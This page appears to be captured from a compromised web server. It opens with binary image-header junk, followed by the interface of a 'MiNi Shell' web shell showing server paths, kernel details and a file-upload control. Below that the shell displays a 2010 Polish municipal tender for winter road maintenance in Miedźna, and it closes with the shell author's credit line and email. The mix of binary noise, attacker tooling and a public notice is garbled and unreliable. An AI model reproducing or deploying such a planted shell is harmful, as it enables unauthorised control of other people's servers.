JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101014/288179-N-2010.html

<p class="kh_header"><b>Miedźna: Zimowe utrzymanie dróg w gminie Miedźna w sezonie 2010/2011 wraz    z pozimowym uprzątnięciem dróg z materiałów użytych do zwalczania śliskości - dotyczy dróg administrowanych przez Gminę i dróg powiatowych na terenie Gminy</b><br>
<b>Numer ogłoszenia: 288179 - 2010; data zamieszczenia: 14.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miedźna , ul. Wiejska 131, 43-227 Miedźna, woj. śląskie, tel. 032 2116338, 2116196, 2116160, faks 032 2116089.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miedzna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg w gminie Miedźna w sezonie 2010/2011 wraz    z pozimowym uprzątnięciem dróg z materiałów użytych do zwalczania śliskości - dotyczy dróg administrowanych przez Gminę i dróg powiatowych na terenie Gminy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Wykaz dróg powiatowych objętych zamówieniem wraz z ich długością, przynależnym standardem i kolejnością odśnieżania zawarty jest w załączniku nr 2.
 2.Zimowe utrzymanie dróg na terenie gminy dotyczy:
 a)Dróg powiatowych o łącznej długości 35,1 km
 b)Dróg administrowanych przez Gminę o łącznej długości 65,0 km.
 3.Zimowe utrzymanie dróg, polegać będzie na usuwaniu z jezdni śniegu, zasp, błota pośniegowego, języków śniegowych oraz likwidowaniu śliskości jezdni na skutek gołoledzi, śniegu, szadzi, szronu i oblodzenia nawierzchni drogowej, a także na usuwaniu śniegu, lodu, śliskości i błota z chodników przy drogach  z zastrzeżeniem art. 5 ust. 1 Ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (Dz.U. nr 132, poz. 622 z późniejszymi zmianami).
 4.Wymagania dotyczące technicznego i jakościowego wykonania prac:
 a)sprzęt powinien być przygotowany w takim stopniu, aby był gotowy do użycia w ciągu 1 godziny od chwili powzięcia decyzji o konieczności podjęcia akcji na drodze.
 b)Zimowe utrzymanie należy prowadzić:
b.1) w pierwszej kolejności na drogach powiatowych głównych, tj  ul. Wiejska w Miedźnej od skrzyżowania z ul. Pszczyńską, przez Miedźną, Frydek (ul. Bieruńska), Gilowice (ul. Górnośląska) do Woli  (ul. Pszczńska), z wyprowadzeniem do Międzyrzecza, Jedliny i Oświęcimia, ul. Topolowa w Miedźnej i Miodowa we Frydku. Druga nitka ul. Lompy w Gilowicach i ul. Topolowej w Górze do skrzyżowania z ul. Pszczyńską
b.2) w drugiej kolejności na pozostałych odc. dróg powiatowych i głównych drogach gminnych.
b.3) w trzeciej kolejności na pozostałych drogach.
 5.Zwalczanie gołoledzi winno nastąpić natychmiast po jej wystąpieniu materiałami uszorstniającymi w zależności od sytuacji i w miejscach niebezpiecznych
 a)skrzyżowania,
 b)łuki poziome i pionowe,
 c)przejścia dla pieszych,
 d)przystanki autobusowe.
 6.Firma na okres ogłoszenia klęski żywiołowej będzie w imieniu Wójta Gminy odpowiedzialna za organizację wszelkich działań związanych z utrzymaniem przejezdności dróg na terenie gminy, przy wykorzystaniu również firm obcych.
 7.Po zakończeniu akcji zimowego utrzymania należy przystąpić do pozimowego oczyszczenia nawierzchni z resztek materiałów sypkich i nanosów.
 8.Zamawiający nie ponosi kosztów utrzymywania stanu pogotowia dla potrzeb zimowego utrzymania dróg.
 9.Sposób realizacji zamówienia.
 a)Zakres prac prowadzonych przy odśnieżaniu dróg oraz technologia wynikają z aktualnie obowiązujących standardów utrzymania dróg oraz wymogów stawianych przez zamawiającego. Poszczególnym standardom zimowego utrzymania przypisane są warunki ruchu na jezdni oraz dopuszczalne odstępstwa od standardu w warunkach śniegu i śliskości zimowej, jak również czas występowania tych odstępstw.
 b)Dla dróg określonych w pkt III ust. 4 lit b p.pkt b.1. należy przyjąć taki zakres prac związanych z zimowym utrzymaniem, aby wyeliminować występowanie warstwy zjeżdżonego śniegu o grubości utrudniającej ruch samochodów osobowych (tzw. muldy) oraz zaleganie warstwy luźnego śniegu.
 c)Dla dróg określonych w pkt III ust. 4 lit b p.pkt b.2. należy przyjąć taki zakres prac związanych z zimowym utrzymaniem, aby ograniczyć do minimum występowanie warstwy zjeżdżonego śniegu (tzw. muldy) o grubości utrudniającej ruch samochodów osobowych oraz zaleganie warstwy luźnego śniegu.
 d)Dla dróg określonych w pkt III ust. 4 lit b p.pkt b.3. należy przyjąć taki zakres prac związanych z zimowym utrzymaniem, aby ograniczyć do minimum występowanie warstwy zjeżdżonego śniegu (tzw. muldy)          o grubości utrudniającej ruch samochodów osobowych oraz zaleganie warstwy luźnego śniegu.
 10.Opis   standardu   dla   dróg   zaliczanych   do I-szej   kolejności  zimowego   
     utrzymania
 a)Zakres: Jezdnia odśnieżona na całej szerokości a śliskość zimowa zlikwidowana na:
skrzyżowaniach z drogami twardymi 
skrzyżowaniach z liniami kolejowymi
odcinkach o pochyleniu > 4%
niebezpiecznych łukach poziomych i pionowych
przystankach autobusowych
innych miejscach ustalonych przez zarząd drogi.
 b)Dopuszczalne odstępstwa od stanu nawierzchni opisanego I-szą kolejnością zimowego utrzymania oraz czas w jakim skutki danego zjawiska atmosferycznego powinny być usunięte (zlikwidowane):
po ustaniu opadów śniegu (dotyczy jezdni i poboczy):
śnieg luźny może zalegać - do 6 godz.
może występować warstwa zjeżdżonego śniegu o grubości  utrudniającej ruchu samochodów osobowych - do 6 godz.
zaspy mogą występować do 6 godz.
od stwierdzenia zjawiska atmosferycznego przez kierującego zimowym utrzymaniem lub powzięcia przez niego uwiarygodnionych informacji    o wystąpieniu powyższego:
gołoledzi - 5 godz.
szronu - 5 godz.
szadzi - 5 godz.
lodowicy - 5 godz.
śliskości pośniegowej - 6 godz.
 11.Opis standardu dla dróg zaliczanych do II-giej kolejności zimowego utrzymania
 a)Zakres: Jezdnia odśnieżona na całej szerokości a śliskość zimowa zlikwidowana na odcinkach decydujących o możliwości ruchu
 b)Dopuszczalne odstępstwa od stanu nawierzchni opisanego II-gą kolejnością zimowego utrzymania oraz czas, w jakim skutki danego zjawiska atmosferycznego powinny być usunięte (zlikwidowane):
po ustaniu opadów śniegu (dotyczy jezdni i poboczy):
śnieg luźny może zalegać - do 8 godz.
może występować warstwa zjeżdżonego śniegu o grubości utrudniającej ruch samochodów osobowych - do 6 godz.
zaspy mogą występować do 8 godz. Dopuszcza się przerwy w komunikacji do 8 godz.
od stwierdzenia zjawiska atmosferycznego przez kierującego zimowym utrzymaniem lub powzięcia przez niego uwiarygodnionych informacji o wystąpieniu powyższego; w miejscach wyznaczonych:
gołoledzi - 8 godz.
śliskości pośniegowej - 10 godz.
lodowicy - 8 godz.
 12.Opis standardu dla dróg zaliczanych do III- ciej kolejności zimowego utrzymania Zakres: Jezdnia odśnieżona na całej szerokości, w miejscach zasp odśnieżony co najmniej jeden pas ruchu z wykonaniem mijanek. Jezdnia posypana na odcinkach decydujących o możliwości ruchu.
 a)Dopuszczalne odstępstwa od stanu nawierzchni opisanego III- cią kolejnością zimowego utrzymania oraz czas, w jakim skutki danego zjawiska atmosferycznego powinny być usunięte (zlikwidowane):
po ustaniu opadów śniegu (dotyczy jezdni i poboczy):
śnieg luźny może zalegać - do 12 godz.
może występować warstwa zjeżdżonego śniegu o grubości utrudniającej ruch samochodów osobowych - 12 godz.
zaspy mogą występować do 16 godz. Dopuszcza się przerwy w komunikacji do 14 godz.
od stwierdzenia zjawiska atmosferycznego przez kierującego zimowym utrzymaniem lub powzięcia przez niego uwiarygodnionych informacji o wystąpieniu powyższego; w miejscach wyznaczonych:
gołoledzi - 10 godz.
śliskości pośniegowej - 14 godz.
 13.Za efekty uzyskane w wyniku prowadzonej akcji zimowego utrzymania dróg oraz przyjętą technologię i sposób prowadzenia prac związanych z zimowym utrzymaniem dróg a także za czas każdorazowego rozpoczynania i zakończenia w/w prac całkowicie odpowiada Wykonawca usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2, 90.61.10.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o informacje zawarte w niżej wymaganych dokumentach i oświadczeniach, na zasadzie spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o informacje zawarte w niżej wymaganych dokumentach i oświadczeniach, na zasadzie spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o informacje zawarte w niżej wymaganych dokumentach i oświadczeniach, na zasadzie spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o informacje zawarte w niżej wymaganych dokumentach i oświadczeniach, na zasadzie spełnia /nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków dokonana zostanie w oparciu o informacje zawarte w niżej wymaganych dokumentach i oświadczeniach, na zasadzie spełnia /nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz ofertowy zał. nr 1. zawierający cenę ofertową oraz wymagane oświadczenia - wypełniony w oparciu o załącznik  nr 1a  (formularz kalkulacji ceny).
2) Oświadczenie, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne.
3) Kalkulacja ceny, na załączniku nr 1a  winna być zgodna wartościowo    z wynagrodzeniem zaoferowanym przez wykonawcę  w ramach oferty .
4) Oświadczenie o zakresie robót, który wykonawca zamierza powierzyć podwykonawcom. W przypadku wykonywania całości robót w siłach własnych oświadczenie powyższe nie jest wymagane.
5) Zaparafowany na dowód akceptacji przez osobę (osoby) upoważnioną do reprezentacji Wykonawcy projekt umowy zał nr 6.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miedzna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.miedzna.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2010 godzina 09:00, miejsce: Oferty należy składać w Sekretariacie Urzędu Gminy w Miedźnej, ul. Wiejska 131 pokój nr 6 w budynku A lub przesyłką pocztową (poleconą) na adres:
Urząd Gminy Miedźna, ul. Wiejska 131,  43-227 MIEDŹNA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com